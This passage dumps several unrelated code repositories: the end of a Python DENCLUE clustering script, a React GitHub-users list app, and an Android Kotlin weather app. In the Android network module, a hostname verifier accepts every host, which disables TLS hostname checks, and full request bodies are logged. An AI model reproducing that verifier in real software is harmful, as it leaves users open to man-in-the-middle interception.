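#   x(t+1) = sum_i K(x(t), x_i) * x_i / sum_i K(x(t), x_i),
# which is what next_step() below computes; find_attractor() iterates it until the
# normalized weight mass stops changing by more than the tolerance e.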
# Compute X(t+1)
def next_step(d, data, h):
m, n = data.shape
xx = np.zeros((1, n))
W = np.ones((m, 1))
w = 0
for i in range(m):
k = kernelize(d, data[i], h, n)
k= k * W[i] / (h ** n)
w = w + k
xx = xx + (k * data[i])
xx = xx / w
a = w / np.sum(W)
return [xx, a]
def find_attractor(d, D, h, e):
x1 = np.copy(d)
b = 0
while True:
x0 = np.copy(x1)
x1, a = next_step(x0, D, h)
ee = a - b
b = a
if ee < e:
break
return x1[0]
def Denclue(data,min,e,h):
m, n = data.shape
    attractor = [] # density attractors found so far
    point = {} # maps each attractor to the points it attracts
for i in range(m):
den_attractor = find_attractor(data[i],data,h,e)
Density = density(den_attractor,data,h,n)
if Density >= min:
if ",".join('%s' % x for x in den_attractor) in point:
p = point[",".join('%s' % x for x in den_attractor)]
p.append(data[i].tolist())
point[",".join('%s' % x for x in den_attractor)] = p
else:
point[",".join('%s' % x for x in den_attractor)] = [data[i].tolist()]
den_attractor = den_attractor.tolist()
if den_attractor not in attractor:
attractor.append(den_attractor)
    A = [] # attractors grouped into clusters
    cluster_num = np.array(den_arrive(attractor,A))
    print("Total number of clusters: "+str(len(cluster_num)))
a = 0
for i in range(len(cluster_num)):
num = 0
for j in range(len(cluster_num[i])):
num = num + len(point[",".join('%s' % x for x in cluster_num[i][j])])
a = a + num
print("第"+str(i+1)+"个簇的大小为:"+str(num))
print("--------------------------------")
    Point={} # final mapping from each attractor group to its points
    for i in range(len(cluster_num)):
        attractor_s=[] # points gathered from attractors that were merged together
for j in range(len(cluster_num[i])):
c = point[",".join('%s' % x for x in cluster_num[i][j])]
for k in range(len(c)):
attractor_s.append(c[k])
Point[",".join('%s' % x for x in cluster_num[i][0])] = attractor_s
for i in range(len(cluster_num)):
print("第"+str(i+1)+"个簇的密度吸引子为:")
for j in range(len(cluster_num[i])):
print(cluster_num[i][j],end=" ")
if (j+1) % 3 ==0:
print("")
print("")
print("该簇中的一组点为:" )
g = Point[",".join('%s' % x for x in cluster_num[i][0])]
for j in range(len(g)):
print(g[j],end=" ")
if (j+1) % 10 ==0:
print("")
print("")
print("--------------------------------")
    C_point = [] # points grouped by cluster
for i in range(len(cluster_num)):
C_point1 = Point[",".join('%s' % id for id in A[i][0])]
C_point.append(C_point1)
right_num = 0
for i in range(len(C_point)):
num_setosa = 0
num_versicolor = 0
num_virginica =0
for j in range(len(C_point[i])):
            seq = data.tolist().index(C_point[i][j]) # data and data1 share row order, so no +1 offset
if data1[seq][2]=="setosa":
num_setosa += 1
elif data1[seq][2]=="versicolor":
num_versicolor += 1
elif data1[seq][2]=="virginica":
num_virginica += 1
right_num = right_num + max(num_setosa,num_versicolor,num_virginica)
p = right_num / a
print("聚类的纯度为:"+str(p))
data = np.loadtxt("iris.txt",
usecols=(1, 2),
unpack=False,
skiprows=1,
delimiter=' ')
data1 = np.loadtxt("iris.txt",
dtype=str,
usecols=(5),
unpack=False,
skiprows=1,
delimiter=' ')
data1 = np.c_[data,data1]
Denclue(data, 0.3, 0.0001, 0.15) # arguments: minimum density, convergence tolerance, bandwidth
|
5725f260e3331b0e0e31166f1356198f7f315b82
|
[
"Markdown",
"Python"
] | 5
|
Python
|
Hello430000/Python
|
6976ce5b75b26634bc6d7abe4fb04c728317c086
|
b2d64d3698d790270081a401281de3fdc1b163fd
|
refs/heads/master
|
<repo_name>19narek97/github-users-list<file_sep>/src/view/Users/Users.js
import React from "react";
import {Col, Row} from "react-bootstrap";
import "./Users.css"
import UsersList from "./UsersList";
import Skeleton from "antd/es/skeleton";
import {Input} from "antd";
import FormUser from "./FormUser";
import Button from "antd/es/button";
import View from "./viewUser";
class Users extends React.Component {
constructor(props) {
super(props);
this.state = {
isLoadingUsers: false,
currentPage: 1,
data: [],
entry: {},
filterText:null,
unfilteredData:[]
}
}
componentDidMount() {
this.setState({
isLoadingUsers: true
}, () => fetch("https://api.github.com/users", {
method: 'get',
headers: {
Accept: 'application/json',
},
}).then((response) => {
if (response.status >= 200 && response.status < 300) {
return response.json();
} else {
const error = new Error(`HTTP Error ${response.statusText}`);
error.status = response.statusText;
error.response = response;
throw error;
}
}).then((data) => {
this.setState({
isLoadingUsers: false,
data: [...data]
})
}))
}
onModalClose = () => {
this.setState({
entry:{}
},() => this.props.history.push("/users"))
}
onModalSubmit = (user) => {
let {data} = this.state;
if (user.id) {
let newData = data.map((el) => {
if (el.id === user.id) {
return Object.assign({}, el, {
...user
});
} else {
return el;
}
})
this.setState({
data: [...newData]
}, () => this.props.history.push("/users"))
} else {
if(user.avatar_url === undefined){
user.avatar_url = "https://www.web2present.com/wp-content/uploads/2017/02/no-avatar-350x350.jpg"
}
data.unshift(user);
this.setState({
data
},() => this.props.history.push("/users"))
}
}
    setUnfilteredData = (data) => {
        // Snapshot the full list once, before the first filter is applied
        if (this.state.unfilteredData.length === 0) {
            const copy = Object.assign([], data);
            this.setState({unfilteredData: copy});
        }
    }
onChangeSearch = (e) => {
this.setState({
filterText:e.target.value
},() => this.filterData())
}
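    // Client-side search: the first filter call snapshots the unfiltered list via
    // setUnfilteredData, so shortening or clearing the query can match against the
    // full data set again instead of the already-filtered one.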
filterData = () => {
let {data,unfilteredData,filterText} = this.state;
this.setState({
isLoadingUsers:true
})
this.setUnfilteredData(data)
function matchesText(item) {
return item.login ? item.login.toLowerCase().includes(filterText.toLowerCase()) : false;
}
        let dataToFilter = unfilteredData.length > 0 ? unfilteredData : data
let filteredData = dataToFilter
.filter(matchesText);
this.setState({
data:[...filteredData],
isLoadingUsers:false
})
}
addNewUser = () => {
this.setState({
entry:{
login: "",
url: "",
followers_url: "",
following_url: "",
starred_url: "",
subscriptions_url: "",
}
}, () => this.props.history.push(`users/create`))
}
    handleDelete = (id) => {
let {data} = this.state,
users = [...data];
let filteredData = users.filter(el => +el.id !== +id);
this.setState({
data: [...filteredData]
})
}
onView = (id) => {
let {data} = this.state,
entry = data.find(({id: UserId}) => +UserId === +id);
this.setState({
entry
}, () => this.props.history.push(`users/${id}/view`))
}
    handleEdit = (id) => {
let {data} = this.state,
entry = data.find(({id: UserId}) => +UserId === +id);
this.setState({
entry
}, () => this.props.history.push(`users/${id}/edit`))
}
render() {
let {isLoadingUsers, data, currentPage, entry} = this.state;
return (
<Row>
{
isLoadingUsers ? <Skeleton active/> :
<Col>
<Row>
<Col/>
<Col/>
<Col>
<Button type="primary" onClick={this.addNewUser} className="mt-3 float-right" htmlType="button">
Add New User
</Button>
</Col>
<Col>
<Input type="text" className="mt-3" placeholder="Search" onChange={this.onChangeSearch}/>
</Col>
</Row>
<View entry={entry} onClose={this.onModalClose}/>
<FormUser entry={entry} onClose={this.onModalClose} onSubmit={this.onModalSubmit}/>
<UsersList
onView={this.onView}
                                onDelete={this.handleDelete}
                                onEdit={this.handleEdit}
currentPage={currentPage}
data={data}
/>
</Col>
}
</Row>
)
}
}
export default Users<file_sep>/src/components/layouts/UserLayout.js
import React from "react";
import {Container, Row} from "react-bootstrap"
import Navbar from "react-bootstrap/Navbar";
import Nav from "react-bootstrap/Nav";
import {Link} from "react-router-dom"
class UserLayout extends React.Component {
render() {
const {children} = this.props;
return (
<Container fluid={true}>
<Row style={{display: 'block'}}>
<Navbar bg="light" expand='md'>
<Navbar.Brand href="/users">Users</Navbar.Brand>
<Navbar.Collapse id="basic-navbar-nav">
<Nav className="mr-auto">
<Link style={{marginTop: '6px'}} to={"/users"}>Users List</Link>
</Nav>
</Navbar.Collapse>
</Navbar>
</Row>
{children}
</Container>
)
}
}
export default UserLayout<file_sep>/src/view/Users/RenderListUsers.js
import React from "react";
import {Button, Card, Popconfirm} from "antd";
import Divider from "antd/es/divider";
import { withRouter } from "react-router";
function RenderListUsers(props) {
return props.dataUsers.map((item) => {
return (
<Card
bordered={true}
className="mt-3"
                key={item.id} // stable key; random keys force a full re-mount on every render
hoverable
style={{width: 270}}
cover={<img alt="example" src={item.avatar_url}/>}
>
<Divider/>
<div className="emailSetupInfo">
<span className="labelUserInfo">Login: <strong>{item.login}</strong></span> <br/>
<span className="labelUserInfo">Url: <a href={item.url} target="_blank"><strong>{item.url.length > 26 ? item.url.slice(0,26) + "..." : item.url}</strong></a> </span>
</div>
<Button
type="primary"
className="mt-4 mr-2"
disabled={false}
onClick={() => props.onView(item.id)}
>
View
</Button>
<Button
type="primary"
className="mt-4 mr-2"
disabled={false}
onClick={() => props.onEdit(item.id)}
>
Edit
</Button>
<Popconfirm title="Confirm delete" onConfirm={() => props.onDelete(item.id)}>
<Button
type="danger"
className="mt-4 deleteBtn"
disabled={false}
>
Delete
</Button>
</Popconfirm>
</Card>
)
})
}
export default withRouter(RenderListUsers)<file_sep>/src/view/Users/viewUser.js
import React from "react";
import Button from "antd/es/button";
import Modal from "antd/es/modal";
import {withRouter} from "react-router";
class View extends React.Component {
onClose = () => {
const {onClose} = this.props;
onClose()
}
render() {
let {match, entry} = this.props,
{action} = match.params,
isVisible = /^(view)$/i.test(action);
return (
<Modal
title={"View"}
width={1024}
visible={isVisible}
footer={null}
onCancel={this.onClose}
>
<div>
<span style={{fontSize:"34px"}}>Login ` </span> <strong style={{fontSize:"21px"}}>{entry.login}</strong><br/>
<span style={{fontSize:"34px"}}>Url ` <a href={entry.url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Followers Url ` <a href={entry.followers_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.followers_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Following Url ` <a href={entry.following_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.following_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>starred Url ` <a href={entry.starred_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.starred_url}</strong></a> </span><br/>
<span style={{fontSize:"34px"}}>Subscriptions Url ` <a href={entry.subscriptions_url} target="_blank"><strong style={{fontSize:"21px"}}>{entry.subscriptions_url}</strong></a> </span>
</div>
<div className="modal-footer">
<Button type="primary" onClick={this.onClose}>Okay</Button>
</div>
</Modal>
)
}
}
export default withRouter(View)<file_sep>/src/components/rootComponent/RootComponent.js
import React from "react";
import { Redirect } from "react-router-dom";
import { withRouter } from "react-router";
const RootComponent = (props) => {
return (
<div>{ <Redirect to={'/users'}/> }</div>
)
}
export default withRouter(RootComponent)<file_sep>/src/routers.js
import React from "react";
import {Switch} from 'react-router'
import AppRouter from './components/AppRouter/AppRouter'
import UserLayout from "./components/layouts/UserLayout";
import Users from "./view/Users"
import RootComponent from "./components/rootComponent/RootComponent";
class Routers extends React.Component {
render() {
return (
<div>
<Switch>
<AppRouter exact path={'/'} layout={UserLayout} component={RootComponent}/>
<AppRouter exact path={'/users'} layout={UserLayout} component={Users}/>
<AppRouter path="/users/:id(\d+)?/:action([a-z]+)?" layout={UserLayout} component={Users} exact />
</Switch>
</div>
)
}
}
export default Routers
|
9ea4cae4843dada98ffe9b8557846dde9301940c
|
[
"JavaScript"
] | 6
|
JavaScript
|
19narek97/github-users-list
|
4d36b51e22494adb16d40e2e8295f8a67f0cd3fb
|
8659f63d0f5a264f6bad88b962d0c7a6540f5c73
|
refs/heads/master
|
<repo_name>GeetanjaliNaik/WeatherApp<file_sep>/app/src/main/java/com/geeta/weatherapp/data/weather/LocationModel.kt
package com.geeta.weatherapp.data.weather
import androidx.room.Entity
import androidx.room.PrimaryKey
@Entity(tableName = "locationData")
data class LocationModel(@PrimaryKey
var longitude: Double, var latitude: Double)<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/WeatherViewModel.kt
package com.geeta.weatherapp.ui.viewmodel
import android.annotation.SuppressLint
import android.app.Application
import android.content.Context
import android.content.Context.LOCATION_SERVICE
import android.location.Geocoder
import android.location.Location
import android.location.LocationManager
import androidx.lifecycle.MutableLiveData
import androidx.lifecycle.ViewModel
import com.geeta.weatherapp.R
import com.geeta.weatherapp.WeatherApplication
import com.geeta.weatherapp.api.datamanager.WeatherDataManager
import com.geeta.weatherapp.data.weather.LocationModel
import com.geeta.weatherapp.data.weather.WeatherModel
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.utils.AppData
import com.geeta.weatherapp.utils.CommonResponseParser
import com.geeta.weatherapp.utils.unixTimestampToTimeString
import com.google.android.gms.location.FusedLocationProviderClient
import com.google.android.gms.location.LocationRequest
import com.google.android.gms.location.LocationServices
import io.reactivex.Observable
import io.reactivex.android.schedulers.AndroidSchedulers
import io.reactivex.schedulers.Schedulers
import java.io.IOException
import java.lang.Exception
import java.util.*
import java.util.concurrent.TimeUnit
import javax.inject.Inject
class WeatherViewModel @Inject constructor(val application: Application) : ViewModel() {
@Inject
lateinit var weatherDataManager: WeatherDataManager
@Inject
lateinit var appData: AppData
val progressBarLiveData = MutableLiveData<Boolean>()
var weatherData= MutableLiveData<WeatherModel>()
val weatherInfoFailureLiveData = MutableLiveData<String>()
val locationDetail=MutableLiveData<LocationModel>()
fun getWeather()
{
getWeatherData()
}
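    // Cache policy: the stored weather row carries its `dt` timestamp in epoch seconds;
    // if the row is missing or older than two hours we refresh from the API, otherwise
    // we serve it straight from the Room database.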
@SuppressLint("CheckResult")
private fun getWeatherData(){
progressBarLiveData.postValue(true)
try{
WeatherDbRepository.invoke(application).weatherDataDao().getDate()
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
                        if (result == null || result.isEmpty()) {
                            getCurrentWeather()
                            progressBarLiveData.postValue(false)
                        }
                        else {
                            progressBarLiveData.postValue(false)
                            // `dt` is in epoch seconds; refresh when the cached row is older than two hours
                            val times = result[0].toLong() * 1000
                            if (((System.currentTimeMillis() - times) / 3600000) > 2)
                                getCurrentWeather()
                            else
                                getWeatherFromDB()
                        }
}
, {error->
weatherInfoFailureLiveData.postValue( application.getString(R.string.unable_to_get_weather_update))
progressBarLiveData.postValue(false)
})
}
catch (e:Exception)
{
weatherInfoFailureLiveData.postValue( application.getString(R.string.unable_to_get_weather_update))
progressBarLiveData.postValue(false)
}
}
@SuppressLint("CheckResult")
private fun getWeatherFromDB()
{
progressBarLiveData.postValue(true)
WeatherDbRepository.invoke(application).weatherDataDao().getWeather()
.subscribeOn(Schedulers.newThread())
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
weatherData.postValue(result)
progressBarLiveData.postValue(false)
}
, {error->
weatherInfoFailureLiveData.postValue( CommonResponseParser.ErrorParser.parseError(error, true))
progressBarLiveData.postValue(false)
})
}
@SuppressLint("CheckResult")
    fun getCurrentWeather()
{
progressBarLiveData.postValue(true)
WeatherDbRepository.invoke(application).locationDataDao().getLocation()
.subscribeOn(Schedulers.newThread())
.flatMap { result->
if(result==null|| result.isEmpty())
throw Throwable(application.getString(R.string.unable_fatch_data))
else
return@flatMap weatherDataManager.updateWeather(result[0].latitude,result[0].longitude)
}
.map{result->
var weatherDataDao=WeatherDbRepository.invoke(application).weatherDataDao()
weatherDataDao.deleteAll()
weatherDataDao.insertWeather(result)
return@map result
}
.observeOn(AndroidSchedulers.mainThread())
.subscribe(
{result->
// WeatherDbRepository.invoke(application).weatherDataDao().insert(result)
weatherData.postValue(result)
progressBarLiveData.postValue(false)
}
, {error->
weatherInfoFailureLiveData.postValue( CommonResponseParser.ErrorParser.parseError(error, true))
progressBarLiveData.postValue(false)
})
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/api/BaseApiManager.kt
package com.geeta.weatherapp.api
import com.geeta.weatherapp.api.services.WeatherService
import retrofit2.Retrofit
import javax.inject.Inject
import javax.inject.Singleton
/**
* Created by Geetanjali on 16/01/18.
*/
@Singleton
class BaseApiManager @Inject constructor(private var retrofit: Retrofit) {
lateinit var weatherService: WeatherService
private fun initApiManager() {
weatherService = create(WeatherService::class.java)
}
fun <T> create(serviceClass: Class<T>): T {
return retrofit.create(serviceClass)
}
init {
initApiManager()
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/network/NetworkModule.kt
package com.geeta.weatherapp.network
import com.facebook.stetho.okhttp3.StethoInterceptor
import com.geeta.weatherapp.BuildConfig
import com.geeta.weatherapp.api.APIRestConstant
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.utils.AppData
import com.google.gson.Gson
import com.google.gson.GsonBuilder
import com.jakewharton.retrofit2.adapter.rxjava2.RxJava2CallAdapterFactory
import dagger.Module
import dagger.Provides
import dagger.android.AndroidInjectionModule
import okhttp3.OkHttpClient
import okhttp3.logging.HttpLoggingInterceptor
import retrofit2.Retrofit
import retrofit2.converter.gson.GsonConverterFactory
import retrofit2.converter.scalars.ScalarsConverterFactory
import java.util.concurrent.TimeUnit
import javax.inject.Inject
import javax.inject.Singleton
import javax.net.ssl.HostnameVerifier
/*
* Created by Geetanjali on 09/01/18.
*/
@Module(includes = arrayOf(AndroidInjectionModule::class))
class NetworkModule @Inject constructor() {
private val HTTP_CONNECTION_TIMEOUT = 1200 // Seconds
private val HTTP_READ_TIMEOUT = 1200 // Seconds
@Provides
@Singleton
internal fun provideHostnameVerifier(): HostnameVerifier {
return HostnameVerifier { hostname, session -> true }
}
@Provides
@Singleton
internal fun provideOkHttpClient(interceptor: HttpLoggingInterceptor, hostnameVerifier: HostnameVerifier): OkHttpClient {
val builder = OkHttpClient.Builder()
builder.hostnameVerifier(hostnameVerifier)
builder.connectTimeout(HTTP_CONNECTION_TIMEOUT.toLong(), TimeUnit.SECONDS)
builder.readTimeout(HTTP_READ_TIMEOUT.toLong(), TimeUnit.SECONDS)
builder.addInterceptor(interceptor)
/* if (BuildConfig.DEBUG) {
builder.addNetworkInterceptor(StethoInterceptor());
}*/
builder.addInterceptor(ErrorInterceptor())
return builder.build()
}
@Provides
@Singleton
internal fun provideHttpLoggingInterceptor(): HttpLoggingInterceptor {
val logger = HttpLoggingInterceptor()
logger.level = HttpLoggingInterceptor.Level.BODY
return logger
}
@Provides
@Singleton
internal fun provideGson(): Gson {
return GsonBuilder().setLenient().setDateFormat(
"yyyy-MM-dd'T'HH:mm:ss.sssZ").create()
}
@Provides
@Singleton
internal fun provideRetrofit(gson: Gson, okHttpClient: OkHttpClient): Retrofit {
return Retrofit.Builder().baseUrl(APIRestConstant.BASE_API_URL).client(okHttpClient).addConverterFactory(
ScalarsConverterFactory.create()).addConverterFactory(
GsonConverterFactory.create(gson)).addCallAdapterFactory(
RxJava2CallAdapterFactory.create()).build()
}
/*@Provides
@Singleton
internal fun provideRxBus(): RxBus {
return RxBus()
}*/
@Provides
@Singleton
internal fun provideAppData(): AppData {
return AppData()
}
@Provides
@Singleton
internal fun provideBaseApiManager(retrofit: Retrofit):BaseApiManager
{
return BaseApiManager(retrofit)
}
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/viewmodel/WeatherViewModelFactory.kt
package com.geeta.weatherapp.ui.viewmodel
import android.app.Application
import android.content.Context
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import javax.inject.Inject
import javax.inject.Provider
import javax.inject.Singleton
@Singleton
class WeatherViewModelFactory @Inject constructor(private val context: Application): ViewModelProvider.Factory {
override fun <T : ViewModel> create(modelClass: Class<T>): T {
return if (modelClass.isAssignableFrom(WeatherViewModel::class.java!!)) {
WeatherViewModel(context) as T
}
else if (modelClass.isAssignableFrom(LocationViewModel::class.java!!))
{
LocationViewModel(context) as T
}
else {
throw IllegalArgumentException("ViewModel Not Found")
}
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/AppViewModule.kt
package com.geeta.weatherapp.injection.module
import androidx.lifecycle.ViewModel
import androidx.lifecycle.ViewModelProvider
import com.geeta.weatherapp.api.BaseApiManager
import com.geeta.weatherapp.injection.scopes.ViewModelKey
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModel
import com.geeta.weatherapp.ui.viewmodel.WeatherViewModelFactory
import dagger.Binds
import dagger.Module
import dagger.multibindings.IntoMap
@Module
abstract class AppViewModule {
/*
* inject this object into a Map using the @IntoMap annotation,
* with the WeatherViewModel.class as key,
* and a Provider that will build a WeatherViewModel
* object.
*
* */
@Binds
@IntoMap
@ViewModelKey(WeatherViewModel::class)
abstract fun currentWeatherViewModel(weatherViewModel: WeatherViewModel?): ViewModel?
@Binds
abstract fun bindWeatherViewModelFactory(factory: WeatherViewModelFactory?): ViewModelProvider.Factory?
@Binds
@IntoMap
@ViewModelKey(LocationViewModel::class)
abstract fun currentLocationViewModel(locationViewModel: LocationViewModel?): ViewModel?
}
<file_sep>/app/src/main/java/com/geeta/weatherapp/api/services/WeatherService.kt
package com.geeta.weatherapp.api.services
import com.geeta.weatherapp.api.APIRestConstant
import com.geeta.weatherapp.data.weather.WeatherModel
import io.reactivex.Observable
import retrofit2.http.*
interface WeatherService {
// @GET(APIRestConstant.GET_WEATHER)
// abstract fun getCurrentWeatherAddress(@Query("q") lat: String, @Query("appid") appKey: String): Observable<WeatherModel>
@GET(APIRestConstant.GET_WEATHER)
abstract fun getCurrentWeather(@Query("lat") lat: Double, @Query("lon") lon: Double, @Query("appid") appKey: String): Observable<WeatherModel>
}<file_sep>/app/build.gradle
apply plugin: 'com.android.application'
apply plugin: 'kotlin-android'
apply plugin: 'kotlin-kapt'
apply plugin: 'kotlin-android-extensions'
android {
compileSdkVersion 29
buildToolsVersion "29.0.3"
defaultConfig {
applicationId "com.geeta.weatherapp"
minSdkVersion 21
targetSdkVersion 29
versionCode 1
versionName "1.0"
testInstrumentationRunner "androidx.test.runner.AndroidJUnitRunner"
buildConfigField "String", "BASE_URL", "\"" + getBaseUrl() + "\""
buildConfigField "String", "APP_ID", "\"" + getAppId() + "\""
}
compileOptions {
sourceCompatibility JavaVersion.VERSION_1_8
targetCompatibility JavaVersion.VERSION_1_8
}
buildTypes {
release {
minifyEnabled false
proguardFiles getDefaultProguardFile('proguard-android-optimize.txt'), 'proguard-rules.pro'
}
}
dataBinding {
enabled = true
}
testOptions {
unitTests.returnDefaultValues = true
}
}
kapt {
correctErrorTypes true
}
ext {
daggerVersion = '2.26'
stethoVersion = '1.5.0'
retrofitVersion = '2.7.1'
okHttpVersion = '4.4.0'
rxAndroidVersion = '2.0.1'
rxJavaVersion = '2.1.6'
multidexVersion='1.0.3'
room_version = "2.2.4"
}
dependencies {
implementation fileTree(dir: 'libs', include: ['*.jar'])
implementation "org.jetbrains.kotlin:kotlin-stdlib-jdk7:$kotlin_version"
implementation 'androidx.appcompat:appcompat:1.1.0'
implementation 'androidx.core:core-ktx:1.0.2'
implementation 'androidx.constraintlayout:constraintlayout:1.1.3'
testImplementation 'junit:junit:4.12'
androidTestImplementation 'androidx.test.ext:junit:1.1.1'
androidTestImplementation 'androidx.test.espresso:espresso-core:3.2.0'
//daggger
implementation "com.google.dagger:dagger:$daggerVersion"
kapt "com.google.dagger:dagger-compiler:$daggerVersion"
kapt "com.google.dagger:dagger-android-processor:$daggerVersion"
implementation "com.google.dagger:dagger-android:$daggerVersion"
implementation "com.google.dagger:dagger-android-support:$daggerVersion"
// Retrofit
implementation "com.squareup.retrofit2:retrofit:$retrofitVersion"
implementation "com.squareup.retrofit2:retrofit-converters:$retrofitVersion"
implementation "com.squareup.retrofit2:converter-gson:$retrofitVersion"
implementation "com.squareup.okhttp3:okhttp:$okHttpVersion"
implementation "com.squareup.okhttp3:logging-interceptor:$okHttpVersion"
implementation "com.squareup.retrofit2:converter-jackson:${retrofitVersion}"
implementation 'com.squareup.retrofit2:converter-scalars:2.1.0'
implementation 'com.jakewharton.retrofit:retrofit2-rxjava2-adapter:1.0.0'
//Rxjava and RxAndroid
implementation "io.reactivex.rxjava2:rxandroid:$rxAndroidVersion"
implementation "io.reactivex.rxjava2:rxjava:$rxJavaVersion"
//MultiDex
implementation "com.android.support:multidex:$multidexVersion"
implementation 'com.google.android.gms:play-services-location:17.0.0'
implementation 'androidx.lifecycle:lifecycle-viewmodel-ktx:2.2.0'
implementation 'com.google.android.material:material:1.2.0-alpha05'
//room
implementation "androidx.room:room-runtime:$room_version"
kapt "androidx.room:room-compiler:$room_version" // For Kotlin use kapt instead of annotationProcessor
// implementation "androidx.room:room-ktx:$room_version"
implementation "androidx.room:room-rxjava2:$room_version"
// testImplementation "androidx.room:room-testing:$room_version"
// implementation "com.google.android.material:material:$material_version"
implementation "android.arch.work:work-runtime:1.0.1"
testImplementation 'org.mockito:mockito-inline:2.11.0'
implementation 'androidx.work:work-rxjava2:2.3.4'
//Stetho
implementation "com.facebook.stetho:stetho-okhttp3:$stethoVersion"
debugImplementation "com.facebook.stetho:stetho:$stethoVersion"
debugImplementation "com.facebook.stetho:stetho-okhttp3:$stethoVersion"
}
def getBaseUrl() {
Properties properties = new Properties()
properties.load(project.rootProject.file('local.properties').newDataInputStream())
String baseUrl = properties.getProperty("base_url")
if(baseUrl==null)
throw new GradleException("Add 'base_url' field at local.properties file. For more details: https://github.com/hasancse91/weather-app-android-mvvm/blob/master/README.md")
return baseUrl
}
def getAppId() {
Properties properties = new Properties()
properties.load(project.rootProject.file('local.properties').newDataInputStream())
String appId = properties.getProperty("app_id")
if(appId==null)
throw new GradleException("Add 'app_id' field at local.properties file. For more details: https://github.com/hasancse91/weather-app-android-mvvm/blob/master/README.md")
return appId
}<file_sep>/app/src/main/java/com/geeta/weatherapp/injection/module/DataBaseModule.kt
package com.geeta.weatherapp.injection.module
import android.app.Application
import android.content.Context
import androidx.room.Room
import com.geeta.weatherapp.database.WeatherDataBase
import com.geeta.weatherapp.database.WeatherDataDao
import com.geeta.weatherapp.database.repositry.LocationDataDao
import com.geeta.weatherapp.database.repositry.WeatherDbRepository
import com.geeta.weatherapp.database.repositry.WeatherDbRepositoryLis
import com.geeta.weatherapp.injection.scopes.ApplicationContext
import com.geeta.weatherapp.injection.scopes.PerApplication
import dagger.Module
import dagger.Provides
import dagger.android.AndroidInjectionModule
import javax.inject.Singleton
@Module(includes = arrayOf(AndroidInjectionModule::class))
class DataBaseModule() {
// val dataBase:WeatherDataBase=
@Provides
@Singleton
internal fun provideDatabase(@ApplicationContext application: Application): WeatherDataBase? {
return Room.databaseBuilder(
application,
WeatherDataBase::class.java, "weather_db"
).build()
}
@Provides
@Singleton
internal fun provideWeatherDataDao(weatherDataBase: WeatherDataBase): WeatherDataDao? {
return weatherDataBase.weatherDataDao()
}
@Provides
@Singleton
internal fun provideLocationDataDao(weatherDataBase: WeatherDataBase): LocationDataDao? {
return weatherDataBase.locationDataDao()
}
@Provides
@Singleton
internal fun provideWeatherRepository(weatherDataDao: WeatherDataDao,locationDataDao: LocationDataDao): WeatherDbRepositoryLis? {
return WeatherDbRepository(weatherDataDao,locationDataDao)
}
}<file_sep>/app/src/main/java/com/geeta/weatherapp/ui/WeatherPermissionActivity.kt
package com.geeta.weatherapp.ui
import android.Manifest
import android.annotation.SuppressLint
import android.app.Activity
import android.app.AlertDialog
import android.content.Context
import android.content.Intent
import android.content.pm.PackageManager
import android.location.LocationManager
import android.os.Bundle
import android.provider.Settings
import android.widget.Toast
import androidx.core.app.ActivityCompat
import androidx.lifecycle.Observer
import androidx.lifecycle.ViewModelProvider
import com.cafecraft.aps.ui.base.BaseActivity
import com.geeta.weatherapp.R
import com.geeta.weatherapp.ui.viewmodel.LocationViewModel
import com.geeta.weatherapp.utils.AppUtils
import com.geeta.weatherapp.utils.GPS_REQUEST
import com.geeta.weatherapp.utils.GpsUtils
import com.geeta.weatherapp.utils.LOCATION_REQUEST
import kotlinx.android.synthetic.main.activity_main.*
import javax.inject.Inject
class WeatherPermissionActivity :BaseActivity()
{
private var isGPSEnabled = false
override fun onCreate(savedInstanceState: Bundle?) {
super.onCreate(savedInstanceState)
setContentView(R.layout.activity_main)
GpsUtils(this).turnGPSOn(object : GpsUtils.OnGpsListener {
override fun gpsStatus(isGPSEnable: Boolean) {
this@WeatherPermissionActivity.isGPSEnabled = isGPSEnable
}
})
}
override fun onStart() {
super.onStart()
invokeLocationAction()
}
override fun onActivityResult(requestCode: Int, resultCode: Int, data: Intent?) {
super.onActivityResult(requestCode, resultCode, data)
if (resultCode == Activity.RESULT_OK) {
if (requestCode == GPS_REQUEST) {
isGPSEnabled = true
invokeLocationAction()
}
}
}
private fun invokeLocationAction() {
when {
!isGPSEnabled -> latLong.text = getString(R.string.kindly_enable_location)
isPermissionsGranted() -> startLocationUpdate()
shouldShowRequestPermissionRationale() -> latLong.text = getString(R.string.permission_request)
else -> ActivityCompat.requestPermissions(
this,
arrayOf(Manifest.permission.ACCESS_FINE_LOCATION, Manifest.permission.ACCESS_COARSE_LOCATION),
LOCATION_REQUEST
)
}
}
private fun startLocationUpdate() {
moveNextToFinishingIt(WeatherActivity::class.java)
}
private fun isPermissionsGranted() =
ActivityCompat.checkSelfPermission(
this,
Manifest.permission.ACCESS_FINE_LOCATION
) == PackageManager.PERMISSION_GRANTED &&
ActivityCompat.checkSelfPermission(
this,
Manifest.permission.ACCESS_COARSE_LOCATION
) == PackageManager.PERMISSION_GRANTED
private fun shouldShowRequestPermissionRationale() =
ActivityCompat.shouldShowRequestPermissionRationale(
this,
Manifest.permission.ACCESS_FINE_LOCATION
) && ActivityCompat.shouldShowRequestPermissionRationale(
this,
Manifest.permission.ACCESS_COARSE_LOCATION
)
@SuppressLint("MissingPermission")
override fun onRequestPermissionsResult(requestCode: Int, permissions: Array<String>, grantResults: IntArray) {
super.onRequestPermissionsResult(requestCode, permissions, grantResults)
when (requestCode) {
LOCATION_REQUEST -> {
invokeLocationAction()
}
}
}
